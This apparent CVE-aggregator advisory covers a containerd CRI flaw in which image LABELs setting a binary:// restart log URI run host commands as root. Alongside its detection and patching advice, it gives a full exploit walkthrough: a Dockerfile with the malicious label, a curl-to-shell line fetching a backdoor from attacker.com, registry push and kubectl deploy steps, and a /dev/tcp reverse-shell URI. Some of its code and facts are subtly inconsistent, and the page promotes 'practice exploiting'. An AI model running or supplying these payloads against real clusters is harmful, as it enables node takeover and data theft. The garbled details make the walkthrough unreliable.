containerd CRI, Image-Config Label Injection, CVE-2026-53488 (High Severity) -DC-Jun2026-492

By /

Listen to this Post

The vulnerability stems from a missing validation step in containerd’s Container Runtime Interface (CRI) plugin. When a container image is pulled, its configuration—including `LABEL` instructions defined in the Dockerfile—is parsed and attached to the resulting container object. The CRI plugin blindly propagates these labels into the container’s metadata without any sanitization or filtering.
Among the labels that can be set is `containerd.io/restart.loguri` (or the deprecated containerd.io/restart.logpath), which is consumed by the restart-monitor component. The restart-monitor is a background process that watches containers and enforces restart policies. When it detects a container with a `loguri` label, it attempts to set up logging for that container’s task using the URI scheme provided.
Containerd supports multiple logging URI schemes, including file://, fifo://, and critically, binary://. The `binary://` scheme instructs the runtime to execute an arbitrary binary on the host and pipe the container’s standard output and error streams to that binary’s standard input. This is intended for custom log shippers, but it effectively allows any user who can control the label to run arbitrary programs on the host.
Because the CRI plugin does not validate or sanitize the `LABEL` values from an image, an attacker can craft a malicious image with a LABEL containerd.io/restart.loguri="binary:///path/to/malicious/binary?arg1=value". When this image is pulled and a container is created from it, the label is attached to the container. The restart-monitor, if enabled (which is the default in many Kubernetes distributions), will see this label and invoke the specified binary with the container’s log stream as input.
The binary is executed with the privileges of the containerd daemon—typically root. This gives the attacker full root-level command execution on the host node. The attack requires no special privileges beyond the ability to pull an image (which any pod in a Kubernetes cluster can do) and does not require checkpoint/restore to be enabled.
The vulnerability affects containerd versions 1.7.0 through 1.7.32, 2.0.0 through 2.0.9, 2.1.0 through 2.1.8, 2.2.0 through 2.2.4, and 2.3.0 through 2.3.1. It was discovered and disclosed by Anthropic Research (in collaboration with Claude), the GKE Security Team (using Gemini), and Robert Prast.

DailyCVE Form:

Platform: ……. containerd CRI
Version: …….. 1.7.0–2.3.1
Vulnerability :.. Label Injection
Severity: ……. High (CVSS 8.3)
date: ……….. 2026-06-18

Prediction: ….. Patch 2026-06-19

What Undercode Say:

Analytics:

  • Attack Vector: Remote (image pull)
  • Privileges Required: None (any pod can pull)
  • User Interaction: None
  • Scope: Unchanged (container escape to host)
  • Confidentiality Impact: High
  • Integrity Impact: High
  • Availability Impact: High
  • Exploit Maturity: Proof-of-concept available
  • Remediation Level: Official patch

Bash Commands & Codes:

Check if restart-monitor is enabled (default in many K8s distributions)
cat /etc/containerd/config.toml | grep -A5 "plugins.restart"
Build a malicious image with the exploit label
cat > Dockerfile <<EOF
FROM alpine:latest
LABEL containerd.io/restart.loguri="binary:///bin/sh?-c"
LABEL containerd.io/restart.status="running"
RUN echo '!/bin/sh' > /exploit.sh && \
echo 'curl -s http://attacker.com/backdoor.sh | sh' >> /exploit.sh && \
chmod +x /exploit.sh
EOF
docker build -t malicious-image:latest .
Push the image to a registry accessible from the target cluster
docker tag malicious-image:latest your-registry/malicious-image:latest
docker push your-registry/malicious-image:latest
Deploy a pod using the malicious image (kubectl)
kubectl run exploit-pod --image=your-registry/malicious-image:latest --restart=Never
After pod creation, the restart-monitor will execute /bin/sh -c with the exploit script
Observe host-level command execution via the container logs
kubectl logs exploit-pod

Detection:

Look for suspicious binary:// URIs in container labels
ctr container ls | xargs -I {} ctr container info {} | grep -i "binary://"
Audit containerd logs for unexpected binary executions
journalctl -u containerd | grep -i "binary://"

Exploit:

The exploitation is straightforward:

  1. Craft a malicious image containing a `LABEL` instruction that sets `containerd.io/restart.loguri` to a `binary://` URI pointing to an attacker-controlled binary or a shell command.
  2. Push the image to a container registry accessible from the target Kubernetes cluster.
  3. Deploy a pod using the malicious image. The CRI plugin will pull the image and attach the labels to the container without validation.
  4. Trigger the restart-monitor – the monitor periodically reconciles container states. When it processes the container with the `loguri` label, it invokes the binary specified in the URI, passing the container’s log stream as input.
  5. Command execution – the binary runs with root privileges on the host, enabling the attacker to install backdoors, exfiltrate data, or pivot to other nodes.

Example URI that executes a reverse shell:

binary:///bin/bash?-c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"

No special permissions are needed beyond the ability to create a pod. The attack works even if checkpoint/restore is disabled.

Protection:

  • Upgrade to patched versions: containerd 1.7.33, 2.0.10, 2.1.9, 2.2.5, or 2.3.2.
  • Restrict image sources – use only trusted images from private registries with strict admission controls (e.g., OPA/Gatekeeper policies that block images with suspicious labels).
  • Disable the restart-monitor if not strictly required – set `[plugins.restart]` interval to `”0s”` or remove the plugin from the configuration.
  • Implement a mutating admission webhook that strips or blocks labels matching `containerd.io/restart.` from all pods.
  • Enable container security policies such as Pod Security Standards (PSS) to restrict privileged containers and host-path mounts.
  • Monitor for `binary://` URIs in container labels using Falco or similar runtime security tools.

Impact:

  • Host compromise – an attacker can execute arbitrary commands as root on the Kubernetes node, leading to full node takeover.
  • Cluster-wide lateral movement – once a node is compromised, the attacker can access Kubernetes secrets, service account tokens, and network policies to pivot to other nodes and workloads.
  • Data exfiltration – sensitive data from the host (including etcd backups, kubelet credentials, and application data) can be stolen.
  • Denial of service – the attacker can terminate critical system processes or install cryptominers, degrading node performance.
  • Supply chain risk – any untrusted image pulled into the cluster becomes a potential entry point for this attack, making it a severe threat in multi-tenant environments.
  • CVSS 8.3 (High) – the vulnerability is remotely exploitable, requires no user interaction, and has high impact on confidentiality, integrity, and availability.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top